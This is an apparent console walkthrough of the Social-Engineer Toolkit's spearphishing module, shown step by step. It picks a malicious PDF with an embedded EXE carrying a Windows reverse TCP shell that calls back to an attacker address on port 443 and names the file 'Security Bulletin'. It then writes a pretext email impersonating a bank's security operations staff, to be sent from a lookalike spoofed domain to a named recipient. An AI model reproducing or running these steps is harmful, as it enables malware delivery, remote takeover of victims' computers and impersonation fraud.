asdf

1. set> 1
2.  
3. The Spearphishing module allows you to specially craft email messages and send
4. them to a large (or small) number of people with attached fileformat malicious
5. payloads. If you want to spoof your email address, be sure "Sendmail" is in-
6. stalled (apt-get install sendmail) and change the config/set_config SENDMAIL=OFF
7. flag to SENDMAIL=ON.
8.  
9. There are two options, one is getting your feet wet and letting SET do
10. everything for you (option 1), the second is to create your own FileFormat
11. payload and use it in your own attack. Either way, good luck and enjoy!
12.  
13. 1) Perform a Mass Email Attack
14. 2) Create a FileFormat Payload
15. 3) Create a Social-Engineering Template
16.  
17. 99) Return to Main Menu
18.  
19. set:phishing>2
20.  
21. Select the file format exploit you want.
22. The default is the PDF embedded EXE.
23.  
24. ********** PAYLOADS **********
25.  
26. 1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
27. 2) SET Custom Written Document UNC LM SMB Capture Attack
28. 3) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
29. 4) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
30. 5) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
31. 6) Adobe Flash Player "Button" Remote Code Execution
32. 7) Adobe CoolType SING Table "uniqueName" Overflow
33. 8) Adobe Flash Player "newfunction" Invalid Pointer Use
34. 9) Adobe Collab.collectEmailInfo Buffer Overflow
35. 10) Adobe Collab.getIcon Buffer Overflow
36. 11) Adobe JBIG2Decode Memory Corruption Exploit
37. 12) Adobe PDF Embedded EXE Social Engineering
38. 13) Adobe util.printf() Buffer Overflow
39. 14) Custom EXE to VBA (sent via RAR) (RAR required)
40. 15) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
41. 16) Adobe PDF Embedded EXE Social Engineering (NOJS)
42. 17) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
43. 18) Apple QuickTime PICT PnSize Buffer Overflow
44. 19) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
45. 20) Adobe Reader u3D Memory Corruption Vulnerability
46. 21) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
47.  
48. set:payloads>12
49.  
50.  
51. [-] Default payload creation selected. SET will generate a normal PDF with embedded EXE.
52.  
53. 1. Use your own PDF for attack
54. 2. Use built-in BLANK PDF for attack
55.  
56. set:payloads>2
57.  
58. 1) Windows Reverse TCP Shell Spawn a command shell on victim and send back to attacker
59. 2) Windows Meterpreter Reverse_TCP Spawn a meterpreter shell on victim and send back to attacker
60. 3) Windows Reverse VNC DLL Spawn a VNC server on victim and send back to attacker
61. 4) Windows Reverse TCP Shell (x64) Windows X64 Command Shell, Reverse TCP Inline
62. 5) Windows Meterpreter Reverse_TCP (X64) Connect back to the attacker (Windows x64), Meterpreter
63. 6) Windows Shell Bind_TCP (X64) Execute payload and create an accepting port on remote system
64. 7) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
65.  
66. set:payloads>4
67. set> IP address for the payload listener: 8.8.8.8
68. set:payloads> Port to connect back on [443]:443
69. [-] Generating fileformat exploit...
70. [*] Payload creation complete.
71. [*] All payloads get sent to the /root/.set/template.pdf directory
72. [-] As an added bonus, use the file-format creator in SET to create your attachment.
73.  
74. Right now the attachment will be imported with filename of 'template.whatever'
75.  
76. Do you want to rename the file?
77.  
78. example Enter the new filename: moo.pdf
79.  
80. 1. Keep the filename, I don't care.
81. 2. Rename the file, I want to be cool.
82.  
83. set:phishing>2
84. set:phishing> New filename:Security Bulletin
85. [*] Filename changed, moving on...
86.  
87. Social Engineer Toolkit Mass E-Mailer
88.  
89. There are two options on the mass e-mailer, the first would
90. be to send an email to one individual person. The second option
91. will allow you to import a list and send it to as many people as
92. you want within that list.
93.  
94. What do you want to do:
95.  
96. 1. E-Mail Attack Single Email Address
97. 2. E-Mail Attack Mass Mailer
98.  
99. 99. Return to main menu.
100.  
101. set:phishing>1
102.  
103. Do you want to use a predefined template or craft
104. a one time email template.
105.  
106. 1. Pre-Defined Template
107. 2. One-Time Use Email Template
108.  
109. set:phishing>2
110. set:phishing> Subject of the email:New Security Bulletin
111. set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
112. set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:Hello Mr. Public,
113. Next line of the body:
114. Next line of the body: This is Richard Young from the corporate office in New York.
115. Next line of the body: I wanted to make sure that you received our most recent security bulletin. It covers some very crucial information about protecting your systems from network based attacks.
116. Next line of the body: Please ensure that all of the employees at your Tempe, AZ branch read this as well.
117. Next line of the body:
118. Next line of the body: Thank you very much,
119. Next line of the body: Richard Young
120. Next line of the body: Security Operations Center
121. Next line of the body: First Bank of Acmeland^Cset:phishing> Send email to:jpublic@firstacmeland.com
122.  
123. 1. Use a gmail Account for your email attack.
124. 2. Use your own server or open relay
125.  
126. set:phishing>2
127. set:phishing> From address (ex: moo@example.com):ryoung@firstacme1and.com
128. set:phishing> The FROM NAME user will see: :Richard Young
129. set:phishing> Username for open-relay [blank]:
130. Password for open-relay [blank]:
131. set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):smtp.firstacme1and.com
132. set:phishing> Port number for the SMTP server [25]:
133. set:phishing> Flag this message/s as high priority? [yes|no]:yes